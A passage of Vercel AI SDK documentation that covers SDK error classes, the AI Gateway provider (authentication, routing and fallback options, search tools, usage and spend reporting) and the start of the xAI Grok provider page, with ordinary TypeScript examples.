- message: The error message
Checking for this Error
You can check if an error is an instance of AI_NoSpeechGeneratedError using:
import { NoSpeechGeneratedError } from 'ai';
if (NoSpeechGeneratedError.isInstance(error)) {
// Handle the error
}
title: AI_NoSuchModelError description: Learn how to fix AI_NoSuchModelError
AI_NoSuchModelError
This error occurs when a model ID is not found.
Properties
- modelId: The ID of the model that was not found
- modelType: The type of model
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_NoSuchModelError using:
import { NoSuchModelError } from 'ai';
if (NoSuchModelError.isInstance(error)) {
// Handle the error
}
title: AI_NoSuchProviderError description: Learn how to fix AI_NoSuchProviderError
AI_NoSuchProviderError
This error occurs when a provider ID is not found.
Properties
- providerId: The ID of the provider that was not found
- availableProviders: Array of available provider IDs
- modelId: The ID of the model
- modelType: The type of model
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_NoSuchProviderError using:
import { NoSuchProviderError } from 'ai';
if (NoSuchProviderError.isInstance(error)) {
// Handle the error
}
title: AI_NoSuchToolError description: Learn how to fix AI_NoSuchToolError
AI_NoSuchToolError
This error occurs when a model tries to call an unavailable tool.
Properties
- toolName: The name of the tool that was not found
- availableTools: Array of available tool names
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_NoSuchToolError using:
import { NoSuchToolError } from 'ai';
if (NoSuchToolError.isInstance(error)) {
// Handle the error
}
title: AI_NoTranscriptGeneratedError description: Learn how to fix AI_NoTranscriptGeneratedError
AI_NoTranscriptGeneratedError
This error occurs when no transcript could be generated from the input.
Properties
- responses: Array of responses
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_NoTranscriptGeneratedError using:
import { NoTranscriptGeneratedError } from 'ai';
if (NoTranscriptGeneratedError.isInstance(error)) {
// Handle the error
}
title: AI_RetryError description: Learn how to fix AI_RetryError
AI_RetryError
This error occurs when a retry operation fails.
Properties
- reason: The reason for the retry failure
- lastError: The most recent error that occurred during the retries
- errors: Array of all errors that occurred during retry attempts
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_RetryError using:
import { RetryError } from 'ai';
if (RetryError.isInstance(error)) {
// Handle the error
}
title: AI_TooManyEmbeddingValuesForCallError description: Learn how to fix AI_TooManyEmbeddingValuesForCallError
AI_TooManyEmbeddingValuesForCallError
This error occurs when too many values are provided in a single embedding call.
Properties
- provider: The AI provider name
- modelId: The ID of the embedding model
- maxEmbeddingsPerCall: The maximum number of embeddings allowed per call
- values: The array of values that was provided
Checking for this Error
You can check if an error is an instance of AI_TooManyEmbeddingValuesForCallError using:
import { TooManyEmbeddingValuesForCallError } from 'ai';
if (TooManyEmbeddingValuesForCallError.isInstance(error)) {
// Handle the error
}
title: ToolCallRepairError description: Learn how to fix AI SDK ToolCallRepairError
ToolCallRepairError
This error occurs when there is a failure while attempting to repair an invalid tool call.
This typically happens when the AI attempts to fix either
a NoSuchToolError or InvalidToolInputError.
Properties
- originalError: The original error that triggered the repair attempt (either NoSuchToolError or InvalidToolInputError)
- message: The error message
- cause: The underlying error that caused the repair to fail
Checking for this Error
You can check if an error is an instance of ToolCallRepairError using:
import { ToolCallRepairError } from 'ai';
if (ToolCallRepairError.isInstance(error)) {
// Handle the error
}
title: AI_TypeValidationError description: Learn how to fix AI_TypeValidationError
AI_TypeValidationError
This error occurs when type validation fails.
Properties
- value: The value that failed validation
- message: The error message including validation details
Checking for this Error
You can check if an error is an instance of AI_TypeValidationError using:
import { TypeValidationError } from 'ai';
if (TypeValidationError.isInstance(error)) {
// Handle the error
}
title: AI_UnsupportedFunctionalityError description: Learn how to fix AI_UnsupportedFunctionalityError
AI_UnsupportedFunctionalityError
This error occurs when functionality is not supported.
Properties
- functionality: The name of the unsupported functionality
- message: The error message
Checking for this Error
You can check if an error is an instance of AI_UnsupportedFunctionalityError using:
import { UnsupportedFunctionalityError } from 'ai';
if (UnsupportedFunctionalityError.isInstance(error)) {
// Handle the error
}
title: AI Gateway description: Learn how to use the AI Gateway provider with the AI SDK.
AI Gateway Provider
The AI Gateway provider connects you to models from multiple AI providers through a single interface. Instead of integrating with each provider separately, you can access OpenAI, Anthropic, Google, Meta, xAI, and other providers and their models.
Features
- Access models from multiple providers without having to install additional provider modules/dependencies
- Use the same code structure across different AI providers
- Switch between models and providers easily
- Automatic authentication when deployed on Vercel
- View pricing information across providers
- Observability for AI model usage through the Vercel dashboard
Setup
The Vercel AI Gateway provider is part of the AI SDK.
Basic Usage
For most use cases, you can use the AI Gateway directly with a model string:
// use plain model string with global provider
import { generateText } from "ai";
const { text } = await generateText({
model: "openai/gpt-5.4",
prompt: "Hello world",
});
// use provider instance (requires version 5.0.36 or later)
import { generateText, gateway } from "ai";
const { text } = await generateText({
model: gateway("openai/gpt-5.4"),
prompt: "Hello world",
});
The AI SDK automatically uses the AI Gateway when you pass a model string in the creator/model-name format.
Provider Instance
You can also import the default provider instance gateway from ai:
import { gateway } from "ai";
You may want to create a custom provider instance when you need to:
- Set custom configuration options (API key, base URL, headers)
- Use the provider in a provider registry
- Wrap the provider with middleware
- Use different settings for different parts of your application
To create a custom provider instance, import createGateway from ai:
import { createGateway } from "ai";
const gateway = createGateway({
apiKey: process.env.AI_GATEWAY_API_KEY ?? "",
});
You can use the following optional settings to customize the AI Gateway provider instance:
- baseURL string: Use a different URL prefix for API calls. The default prefix is https://ai-gateway.vercel.sh/v1/ai.
- apiKey string: API key that is being sent using the Authorization header. It defaults to the AI_GATEWAY_API_KEY environment variable.
- headers Record<string,string>: Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>: Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
- metadataCacheRefreshMillis number: How frequently to refresh the metadata cache in milliseconds. Defaults to 5 minutes (300,000 ms).
Authentication
The Gateway provider supports two authentication methods:
API Key Authentication
Set your API key via environment variable:
AI_GATEWAY_API_KEY=your_api_key_here
Or pass it directly to the provider:
import { createGateway } from "ai";
const gateway = createGateway({
apiKey: "your_api_key_here",
});
OIDC Authentication (Vercel Deployments)
When deployed to Vercel, the AI Gateway provider supports authenticating using OIDC (OpenID Connect) tokens without API Keys.
How OIDC Authentication Works
- In Production/Preview Deployments:
  - OIDC authentication is handled automatically
  - No manual configuration is needed
  - Tokens are automatically obtained and refreshed
- In Local Development:
  - First, install and authenticate with the Vercel CLI
  - Run vercel env pull to download your project's OIDC token locally
  - For automatic token management, use vercel dev to start your development server; it handles token refreshing automatically
  - For manual token management: if you are not using vercel dev, note that OIDC tokens expire after 12 hours, so you'll need to run vercel env pull again to refresh the token before it expires
Read more about using OIDC tokens in the Vercel AI Gateway docs.
Bring Your Own Key (BYOK)
You can connect your own provider credentials to use with Vercel AI Gateway. This lets you use your existing provider accounts and access private resources.
To set up BYOK, add your provider credentials in your Vercel team's AI Gateway settings. Once configured, AI Gateway automatically uses your credentials. No code changes are needed.
Learn more in the BYOK documentation.
Language Models
You can create language models using a provider instance. The first argument is the model ID in the format creator/model-name:
import { generateText } from "ai";
const { text } = await generateText({
model: "openai/gpt-5.4",
prompt: "Explain quantum computing in simple terms",
});
AI Gateway language models can also be used in the streamText, generateObject, and streamObject functions (see AI SDK Core).
Available Models
The AI Gateway supports models from OpenAI, Anthropic, Google, Meta, xAI, Mistral, DeepSeek, Amazon Bedrock, Cohere, Perplexity, Alibaba, and other providers.
For the complete list of available models, see the AI Gateway documentation.
Dynamic Model Discovery
You can discover available models programmatically:
import { gateway, generateText } from "ai";
const availableModels = await gateway.getAvailableModels();
// List all available models
availableModels.models.forEach((model) => {
console.log(`${model.id}: ${model.name}`);
if (model.description) {
console.log(` Description: ${model.description}`);
}
if (model.pricing) {
console.log(` Input: $${model.pricing.input}/token`);
console.log(` Output: $${model.pricing.output}/token`);
if (model.pricing.cachedInputTokens) {
console.log(
` Cached input (read): $${model.pricing.cachedInputTokens}/token`,
);
}
if (model.pricing.cacheCreationInputTokens) {
console.log(
` Cache creation (write): $${model.pricing.cacheCreationInputTokens}/token`,
);
}
}
});
// Use any discovered model with plain string
const { text } = await generateText({
model: availableModels.models[0].id, // e.g., 'openai/gpt-5.4'
prompt: "Hello world",
});
Credit Usage
You can check your team's current credit balance and usage:
import { gateway } from "ai";
const credits = await gateway.getCredits();
console.log(`Team balance: ${credits.balance} credits`);
console.log(`Team total used: ${credits.total_used} credits`);
The getCredits() method returns your team's credit information based on the authenticated API key or OIDC token:
- balance number - Your team's current available credit balance
- total_used number - Total credits consumed by your team
Generation Lookup
Look up detailed information about a specific generation by its ID, including cost, token usage, latency, and provider details. Generation IDs are available in providerMetadata.gateway.generationId on both generateText and streamText responses.
When streaming, the generation ID is injected on the first content chunk, so you can capture it early in the stream without waiting for completion. This is especially useful in cases where a network interruption or mid-stream error could prevent you from receiving the final response — since the gateway records the final status server-side, you can use the generation ID to look up the results (including cost, token usage, and finish reason) later via getGenerationInfo().
import { gateway, generateText } from 'ai';
// Make a request
const result = await generateText({
model: gateway('anthropic/claude-sonnet-4'),
prompt: 'Explain quantum entanglement briefly',
});
// Get the generation ID from provider metadata
const generationId = result.providerMetadata?.gateway?.generationId;
// Look up detailed generation info
const generation = await gateway.getGenerationInfo({ id: generationId });
console.log(`Model: ${generation.model}`);
console.log(`Cost: $${generation.totalCost.toFixed(6)}`);
console.log(`Latency: ${generation.latency}ms`);
console.log(`Prompt tokens: ${generation.promptTokens}`);
console.log(`Completion tokens: ${generation.completionTokens}`);
With streamText, you can capture the generation ID from the first chunk via fullStream:
import { gateway, streamText } from 'ai';
const result = streamText({
model: gateway('anthropic/claude-sonnet-4'),
prompt: 'Explain quantum entanglement briefly',
});
let generationId: string | undefined;
for await (const part of result.fullStream) {
if (!generationId && part.providerMetadata?.gateway?.generationId) {
generationId = part.providerMetadata.gateway.generationId as string;
console.log(`Generation ID (early): ${generationId}`);
}
}
// Look up cost and usage after the stream completes
if (generationId) {
const generation = await gateway.getGenerationInfo({ id: generationId });
console.log(`Cost: $${generation.totalCost.toFixed(6)}`);
console.log(`Finish reason: ${generation.finishReason}`);
}
The getGenerationInfo() method accepts:
- id string - The generation ID to look up (format: gen_<ulid>; required)
It returns a GatewayGenerationInfo object with the following fields:
- id string - The generation ID
- totalCost number - Total cost in USD
- upstreamInferenceCost number - Upstream inference cost in USD (relevant for BYOK)
- usage number - Usage cost in USD (same as totalCost)
- createdAt string - ISO 8601 timestamp when the generation was created
- model string - Model identifier used
- isByok boolean - Whether Bring Your Own Key credentials were used
- providerName string - The provider that served this generation
- streamed boolean - Whether streaming was used
- finishReason string - Finish reason (e.g. 'stop')
- latency number - Time to first token in milliseconds
- generationTime number - Total generation time in milliseconds
- promptTokens number - Number of prompt tokens
- completionTokens number - Number of completion tokens
- reasoningTokens number - Reasoning tokens used (if applicable)
- cachedTokens number - Cached tokens used (if applicable)
- cacheCreationTokens number - Cache creation input tokens
- billableWebSearchCalls number - Number of billable web search calls
Examples
Basic Text Generation
import { generateText } from "ai";
const { text } = await generateText({
model: "anthropic/claude-sonnet-4.6",
prompt: "Write a haiku about programming",
});
console.log(text);
Streaming
import { streamText } from "ai";
const { textStream } = await streamText({
model: "openai/gpt-5.4",
prompt: "Explain the benefits of serverless architecture",
});
for await (const textPart of textStream) {
process.stdout.write(textPart);
}
Tool Usage
import { generateText, tool } from "ai";
import { z } from "zod";
const { text } = await generateText({
model: "xai/grok-4",
prompt: "What is the weather like in San Francisco?",
tools: {
getWeather: tool({
description: "Get the current weather for a location",
parameters: z.object({
location: z.string().describe("The location to get weather for"),
}),
execute: async ({ location }) => {
// Your weather API call here
return `It's sunny in ${location}`;
},
}),
},
});
Provider-Executed Tools
Some providers offer tools that are executed by the provider itself, such as OpenAI's web search tool. To use these tools through AI Gateway, import the provider to access the tool definitions:
import { generateText, stepCountIs } from "ai";
import { openai } from "@ai-sdk/openai";
const result = await generateText({
model: "openai/gpt-5.4-mini",
prompt: "What is the Vercel AI Gateway?",
stopWhen: stepCountIs(10),
tools: {
web_search: openai.tools.webSearch({}),
},
});
console.dir(result.text);
Gateway Tools
The AI Gateway provider includes built-in tools that are executed by the gateway itself. These tools can be used with any model through the gateway.
Perplexity Search
The Perplexity Search tool enables models to search the web using Perplexity's search API. This tool is executed by the AI Gateway and returns web search results that the model can use to provide up-to-date information.
import { gateway, generateText } from "ai";
const result = await generateText({
model: "openai/gpt-5.4-nano",
prompt: "Search for news about AI regulations in January 2025.",
tools: {
perplexity_search: gateway.tools.perplexitySearch(),
},
});
console.log(result.text);
console.log("Tool calls:", JSON.stringify(result.toolCalls, null, 2));
console.log("Tool results:", JSON.stringify(result.toolResults, null, 2));
You can also configure the search with optional parameters:
import { gateway, generateText } from "ai";
const result = await generateText({
model: "openai/gpt-5.4-nano",
prompt:
"Search for news about AI regulations from the first week of January 2025.",
tools: {
perplexity_search: gateway.tools.perplexitySearch({
maxResults: 5,
searchLanguageFilter: ["en"],
country: "US",
searchDomainFilter: ["reuters.com", "bbc.com", "nytimes.com"],
}),
},
});
console.log(result.text);
console.log("Tool calls:", JSON.stringify(result.toolCalls, null, 2));
console.log("Tool results:", JSON.stringify(result.toolResults, null, 2));
The Perplexity Search tool supports the following optional configuration options:
- maxResults number - The maximum number of search results to return (1-20, default: 10).
- maxTokensPerPage number - The maximum number of tokens to extract per search result page (256-2048, default: 2048).
- maxTokens number - The maximum total tokens across all search results (default: 25000, max: 1000000).
- searchLanguageFilter string[] - Filter search results by language using ISO 639-1 language codes (e.g., ['en'] for English, ['en', 'es'] for English and Spanish).
- country string - Filter search results by country using ISO 3166-1 alpha-2 country codes (e.g., 'US' for the United States, 'GB' for the United Kingdom).
- searchDomainFilter string[] - Limit search results to specific domains (e.g., ['reuters.com', 'bbc.com']). This is useful for restricting results to trusted sources.
- searchRecencyFilter 'day' | 'week' | 'month' | 'year' - Filter search results by relative time period. Useful for always getting recent results (e.g., 'week' for results from the last week).
The tool works with both generateText and streamText:
import { gateway, streamText } from "ai";
const result = streamText({
model: "openai/gpt-5.4-nano",
prompt: "Search for the latest news about AI regulations.",
tools: {
perplexity_search: gateway.tools.perplexitySearch(),
},
});
for await (const part of result.fullStream) {
switch (part.type) {
case "text-delta":
process.stdout.write(part.text);
break;
case "tool-call":
console.log("\nTool call:", JSON.stringify(part, null, 2));
break;
case "tool-result":
console.log("\nTool result:", JSON.stringify(part, null, 2));
break;
}
}
Parallel Search
The Parallel Search tool enables models to search the web using Parallel AI's Search API. This tool is optimized for LLM consumption, returning relevant excerpts from web pages that can replace multiple keyword searches with a single call.
import { gateway, generateText } from "ai";
const result = await generateText({
model: "openai/gpt-5.4-nano",
prompt: "Research the latest developments in quantum computing.",
tools: {
parallel_search: gateway.tools.parallelSearch(),
},
});
console.log(result.text);
console.log("Tool calls:", JSON.stringify(result.toolCalls, null, 2));
console.log("Tool results:", JSON.stringify(result.toolResults, null, 2));
You can also configure the search with optional parameters:
import { gateway, generateText } from "ai";
const result = await generateText({
model: "openai/gpt-5.4-nano",
prompt: "Find detailed information about TypeScript 5.0 features.",
tools: {
parallel_search: gateway.tools.parallelSearch({
mode: "agentic",
maxResults: 5,
sourcePolicy: {
includeDomains: ["typescriptlang.org", "github.com"],
},
excerpts: {
maxCharsPerResult: 8000,
},
}),
},
});
console.log(result.text);
console.log("Tool calls:", JSON.stringify(result.toolCalls, null, 2));
console.log("Tool results:", JSON.stringify(result.toolResults, null, 2));
The Parallel Search tool supports the following optional configuration options:
- mode 'one-shot' | 'agentic' - Mode preset for different use cases:
  - 'one-shot' - Comprehensive results with longer excerpts for single-response answers (default)
  - 'agentic' - Concise, token-efficient results optimized for multi-step agentic workflows
- maxResults number - Maximum number of results to return (1-20). Defaults to 10 if not specified.
- sourcePolicy object - Source policy for controlling which domains to include or exclude:
  - includeDomains - List of domains to include in search results
  - excludeDomains - List of domains to exclude from search results
  - afterDate - Only include results published after this date (ISO 8601 format)
- excerpts object - Excerpt configuration for controlling result length:
  - maxCharsPerResult - Maximum characters per result
  - maxCharsTotal - Maximum total characters across all results
- fetchPolicy object - Fetch policy for controlling content freshness (see the sketch after this list):
  - maxAgeSeconds - Maximum age in seconds for cached content (set to 0 for always fresh)
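As referenced in the fetchPolicy option above, a minimal sketch that forces fresh content by setting maxAgeSeconds to 0:
import { gateway, generateText } from "ai";
const result = await generateText({
  model: "openai/gpt-5.4-nano",
  prompt: "What changed on the TypeScript roadmap today?",
  tools: {
    parallel_search: gateway.tools.parallelSearch({
      fetchPolicy: {
        maxAgeSeconds: 0, // always fetch fresh content instead of cached copies
      },
    }),
  },
});
console.log(result.text);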
The tool works with both generateText and streamText:
import { gateway, streamText } from "ai";
const result = streamText({
model: "openai/gpt-5.4-nano",
prompt: "Research the latest AI safety guidelines.",
tools: {
parallel_search: gateway.tools.parallelSearch(),
},
});
for await (const part of result.fullStream) {
switch (part.type) {
case "text-delta":
process.stdout.write(part.text);
break;
case "tool-call":
console.log("\nTool call:", JSON.stringify(part, null, 2));
break;
case "tool-result":
console.log("\nTool result:", JSON.stringify(part, null, 2));
break;
}
}
Usage Tracking with User and Tags
Track usage per end-user and categorize requests with tags:
import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";
const { text } = await generateText({
model: "openai/gpt-5.4",
prompt: "Summarize this document...",
providerOptions: {
gateway: {
user: "user-abc-123", // Track usage for this specific end-user
tags: ["document-summary", "premium-feature"], // Categorize for reporting
} satisfies GatewayProviderOptions,
},
});
This allows you to:
- View usage and costs broken down by end-user in your analytics
- Filter and analyze spending by feature or use case using tags
- Track which users or features are driving the most AI usage
Querying Spend Reports
Use the getSpendReport() method to query usage data programmatically. The reporting API is only available for Vercel Pro and Enterprise plans. For pricing, see the Custom Reporting docs.
import { gateway } from "ai";
const report = await gateway.getSpendReport({
startDate: "2026-03-01",
endDate: "2026-03-25",
groupBy: "model",
});
for (const row of report.results) {
console.log(`${row.model}: $${row.totalCost.toFixed(4)}`);
}
The getSpendReport() method accepts the following parameters:
- startDate string - Start date in YYYY-MM-DD format (inclusive, required)
- endDate string - End date in YYYY-MM-DD format (inclusive, required)
- groupBy string - Aggregation dimension: 'day' (default), 'user', 'model', 'tag', 'provider', or 'credential_type'
- datePart string - Time granularity when groupBy is 'day': 'day' or 'hour'
- userId string - Filter to a specific user
- model string - Filter to a specific model (e.g. 'anthropic/claude-sonnet-4.5')
- provider string - Filter to a specific provider (e.g. 'anthropic')
- credentialType string - Filter by 'byok' or 'system' credentials
- tags string[] - Filter to requests matching these tags
Each row in results contains a grouping field (matching your groupBy choice) and metrics:
- totalCost number - Total cost in USD
- marketCost number - Market cost in USD
- inputTokens number - Number of input tokens
- outputTokens number - Number of output tokens
- cachedInputTokens number - Number of cached input tokens
- cacheCreationInputTokens number - Number of cache creation input tokens
- reasoningTokens number - Number of reasoning tokens
- requestCount number - Number of requests
You can combine tracking and querying to analyze spend by tags you defined:
import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { gateway, streamText } from 'ai';
// 1. Make requests with tags
const result = streamText({
model: gateway('anthropic/claude-haiku-4.5'),
prompt: 'Summarize this quarter\'s results',
providerOptions: {
gateway: {
tags: ['team:finance', 'feature:summaries'],
} satisfies GatewayProviderOptions,
},
});
// 2. Later, query spend filtered by those tags
const report = await gateway.getSpendReport({
startDate: '2026-03-01',
endDate: '2026-03-31',
groupBy: 'tag',
tags: ['team:finance'],
});
for (const row of report.results) {
console.log(`${row.tag}: $${row.totalCost.toFixed(4)} (${row.requestCount} requests)`);
}
Provider Options
The AI Gateway provider accepts provider options that control routing behavior and provider-specific configurations.
Gateway Provider Options
You can use the gateway key in providerOptions to control how AI Gateway routes requests:
import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";
const { text } = await generateText({
model: "anthropic/claude-sonnet-4.6",
prompt: "Explain quantum computing",
providerOptions: {
gateway: {
order: ["vertex", "anthropic"], // Try Vertex AI first, then Anthropic
only: ["vertex", "anthropic"], // Only use these providers
} satisfies GatewayProviderOptions,
},
});
The following gateway provider options are available:
- order string[] - Specifies the sequence of providers to attempt when routing requests. The gateway will try providers in the order specified. If a provider fails or is unavailable, it will move to the next provider in the list.
  Example: order: ['bedrock', 'anthropic'] will attempt Amazon Bedrock first, then fall back to Anthropic.
- only string[] - Restricts routing to only the specified providers. When set, the gateway will never route to providers not in this list, even if they would otherwise be available.
  Example: only: ['anthropic', 'vertex'] will only allow routing to Anthropic or Vertex AI.
- sort 'cost' | 'ttft' | 'tps' - Sorts available providers by a performance or cost metric before routing. The gateway will try the best-scoring provider first and fall back through the rest in sorted order. If unspecified, providers are ordered using the gateway's default system ranking.
  - 'cost' - lowest cost first
  - 'ttft' - lowest time-to-first-token first
  - 'tps' - highest tokens-per-second first
  When combined with order, the user-specified providers are promoted to the front while the remaining providers follow the sorted order.
  Example: sort: 'ttft' will route to the provider with the fastest time-to-first-token.
  When sort is active, the response's providerMetadata.gateway.routing.sort object contains the sort option used, the resulting execution order, per-provider metric values, and any providers that were deprioritized (see the sketch after this list).
- models string[] - Specifies fallback models to use when the primary model fails or is unavailable. The gateway will try the primary model first (specified in the model parameter), then try each model in this array in order until one succeeds.
  Example: models: ['openai/gpt-5.4-nano', 'google/gemini-3-flash-preview'] will try the fallback models in order if the primary model fails.
- user string - Optional identifier for the end user on whose behalf the request is being made. This is used for spend tracking and attribution purposes, allowing you to track usage per end-user in your application.
  Example: user: 'user-123' will associate this request with end-user ID "user-123" in usage reports.
- tags string[] - Optional array of tags for categorizing and filtering usage in reports. Useful for tracking spend by feature, prompt version, or any other dimension relevant to your application.
  Example: tags: ['chat', 'v2'] will tag this request with "chat" and "v2" for filtering in usage analytics.
- byok Record<string, Array<Record<string, unknown>>> - Request-scoped BYOK (Bring Your Own Key) credentials to use for this request. When provided, any cached BYOK credentials configured in the gateway system are not considered. Requests may still fall back to system credentials if the provided credentials fail.
  Each provider can have multiple credentials (tried in order). The structure is a record where keys are provider slugs and values are arrays of credential objects.
  Examples:
  - Single provider: byok: { anthropic: [{ apiKey: 'sk-ant-...' }] }
  - Multiple credentials: byok: { vertex: [{ projectId: 'proj-1', privateKey: '...' }, { projectId: 'proj-2', privateKey: '...' }] }
  - Multiple providers: byok: { anthropic: [{ apiKey: '...' }], bedrock: [{ accessKeyId: '...', secretAccessKey: '...' }] }
- zeroDataRetention boolean - Restricts routing to providers that have zero data retention agreements with Vercel for AI Gateway. If no providers with zero data retention are available for the model, the request will fail. BYOK credentials are skipped when zeroDataRetention is set to true to ensure that requests are only routed to providers that support ZDR compliance. Request-level ZDR is only available on Vercel Pro and Enterprise plans.
- disallowPromptTraining boolean - Restricts routing to providers that have agreements with Vercel for AI Gateway to not use prompts for model training. If no such providers are available for the model, the request will fail. BYOK credentials are skipped when disallowPromptTraining is set to true to ensure that requests are only routed to providers that do not train on prompt data.
- hipaaCompliant boolean - Restricts routing to models and tools from providers that have signed a BAA with Vercel for the use of AI Gateway (requires the Vercel HIPAA BAA add-on). BYOK credentials are skipped when hipaaCompliant is set to true to ensure that requests are only routed to providers that support HIPAA compliance.
- quotaEntityId string - The unique identifier for the entity against which quota is tracked. Used for quota management and enforcement purposes.
- providerTimeouts object - Per-provider timeouts for BYOK credentials in milliseconds. Controls how long to wait for a provider to start responding before falling back to the next available provider.
  Example: providerTimeouts: { byok: { openai: 5000, anthropic: 2000 } }. For full details, see Provider Timeouts.
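When sort is active, you can read the routing metadata from the response. A sketch; the exact shape of the routing object is described in the sort option above:
import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";
const result = await generateText({
  model: "anthropic/claude-sonnet-4.6",
  prompt: "Explain quantum computing",
  providerOptions: {
    gateway: {
      sort: "ttft", // route to the fastest time-to-first-token provider
    } satisfies GatewayProviderOptions,
  },
});
// Inspect the applied sort, execution order, and per-provider metrics
console.log(result.providerMetadata?.gateway?.routing);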
You can combine these options to have fine-grained control over routing and tracking:
import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";
const { text } = await generateText({
model: "anthropic/claude-sonnet-4.6",
prompt: "Write a haiku about programming",
providerOptions: {
gateway: {
order: ["vertex"], // Prefer Vertex AI
only: ["anthropic", "vertex"], // Only allow these providers
} satisfies GatewayProviderOptions,
},
});
Model Fallbacks Example
The models option enables automatic fallback to alternative models when the primary model fails:
import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";
const { text } = await generateText({
model: "openai/gpt-5.4", // Primary model
prompt: "Write a TypeScript haiku",
providerOptions: {
gateway: {
models: ["openai/gpt-5.4-nano", "google/gemini-3-flash-preview"], // Fallback models
} satisfies GatewayProviderOptions,
},
});
// This will:
// 1. Try openai/gpt-5.4 first
// 2. If it fails, try openai/gpt-5.4-nano
// 3. If that fails, try google/gemini-3-flash-preview
// 4. Return the result from the first model that succeeds
Zero Data Retention Example
Set zeroDataRetention to true to route requests to providers that have zero data retention agreements with Vercel for AI Gateway. If there are no providers available for the model with zero data retention, the request will fail. When zeroDataRetention is false or not specified, there is no enforcement of restricting routing. BYOK credentials are skipped when zeroDataRetention is set to true to ensure that requests are only routed to providers that support ZDR compliance. Request-level ZDR is only available for Vercel Pro and Enterprise plans.
import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";
const { text } = await generateText({
model: "anthropic/claude-sonnet-4.6",
prompt: "Analyze this sensitive document...",
providerOptions: {
gateway: {
zeroDataRetention: true,
} satisfies GatewayProviderOptions,
},
});
Disallow Prompt Training Example
Set disallowPromptTraining to true to route requests to providers that have agreements with Vercel for AI Gateway to not use prompts for model training. If there are no providers available for the model that disallow prompt training, the request will fail. When disallowPromptTraining is false or not specified, there is no enforcement of restricting routing. BYOK credentials are skipped when disallowPromptTraining is set to true to ensure that requests are only routed to providers that do not train on prompt data.
import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";
const { text } = await generateText({
model: "anthropic/claude-sonnet-4.6",
prompt: "Analyze this proprietary business data...",
providerOptions: {
gateway: {
disallowPromptTraining: true,
} satisfies GatewayProviderOptions,
},
});
HIPAA Compliance Example
Set hipaaCompliant to true to route requests only to models or tools by providers that have signed a BAA with Vercel for the use of AI Gateway. If the model or tool does not have a HIPAA-compliant provider, the request will fail. When hipaaCompliant is false or not specified, there is no enforcement of restricting routing. BYOK credentials are skipped when hipaaCompliant is set to true to ensure that requests are only routed to providers that support HIPAA compliance.
import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";
const { text } = await generateText({
model: "anthropic/claude-sonnet-4.6",
prompt: "Analyze this patient data...",
providerOptions: {
gateway: {
hipaaCompliant: true,
} satisfies GatewayProviderOptions,
},
});
Quota Entity ID Example
Set quotaEntityId to track and enforce quota against a specific entity. This is useful for multi-tenant applications where you need to manage quota at the entity level (e.g., per organization or team).
import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";
const { text } = await generateText({
model: "anthropic/claude-sonnet-4.6",
prompt: "Summarize this report...",
providerOptions: {
gateway: {
quotaEntityId: "org-123",
} satisfies GatewayProviderOptions,
},
});
Provider-Specific Options
When using provider-specific options through AI Gateway, use the actual provider name (e.g. anthropic, openai, not gateway) as the key:
import type { AnthropicProviderOptions } from '@ai-sdk/anthropic';
import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { generateText } from 'ai';
const { text } = await generateText({
model: "anthropic/claude-sonnet-4.6",
prompt: "Explain quantum computing",
providerOptions: {
gateway: {
order: ["vertex", "anthropic"],
} satisfies GatewayProviderOptions,
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
} satisfies AnthropicProviderOptions,
},
});
This works with any provider supported by AI Gateway. Each provider has its own set of options - see the individual provider documentation pages for details on provider-specific options.
Available Providers
AI Gateway supports routing to 20+ providers.
For a complete list of available providers and their slugs, see the AI Gateway documentation.
Model Capabilities
Model capabilities depend on the specific provider and model you're using. For detailed capability information, see:
- AI Gateway provider options for an overview of available providers
- Individual AI SDK provider pages for specific model capabilities and features
title: xAI Grok
description: Learn how to use xAI Grok.
xAI Grok Provider
The xAI Grok provider contains language model support for the xAI API.
Setup
The xAI Grok provider is available via the @ai-sdk/xai module. You can install it with:
pnpm add @ai-sdk/xai
Provider Instance
You can import the default provider instance xai from @ai-sdk/xai:
import { xai } from '@ai-sdk/xai';
If you need a customized setup, you can import createXai from @ai-sdk/xai
and create a provider instance with your settings:
import { createXai } from '@ai-sdk/xai';
const xai = createXai({
apiKey: 'your-api-key',
});
You can use the following optional settings to customize the xAI provider instance:
- baseURL string - Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.x.ai/v1.
- apiKey string - API key that is being sent using the Authorization header. It defaults to the XAI_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create xAI models using a provider instance. The
first argument is the model id, e.g. grok-3.
const model = xai('grok-3');
By default, xai(modelId) uses the Chat API. To use the Responses API with server-side agentic tools, explicitly use xai.responses(modelId).
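For example, the two entry points side by side:
const chatModel = xai('grok-3'); // Chat API (default)
const agenticModel = xai.responses('grok-4-fast'); // Responses API with server-side tools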
Example
You can use xAI language models to generate text with the generateText function:
import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';
const { text } = await generateText({
model: xai('grok-3'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
xAI language models can also be used in the streamText, generateObject, and streamObject functions
(see AI SDK Core).
Provider Options
xAI chat models support additional provider options that are not part of
the standard call settings. You can pass them in the providerOptions argument:
const model = xai('grok-3-mini');
await generateText({
model,
providerOptions: {
xai: {
reasoningEffort: 'high',
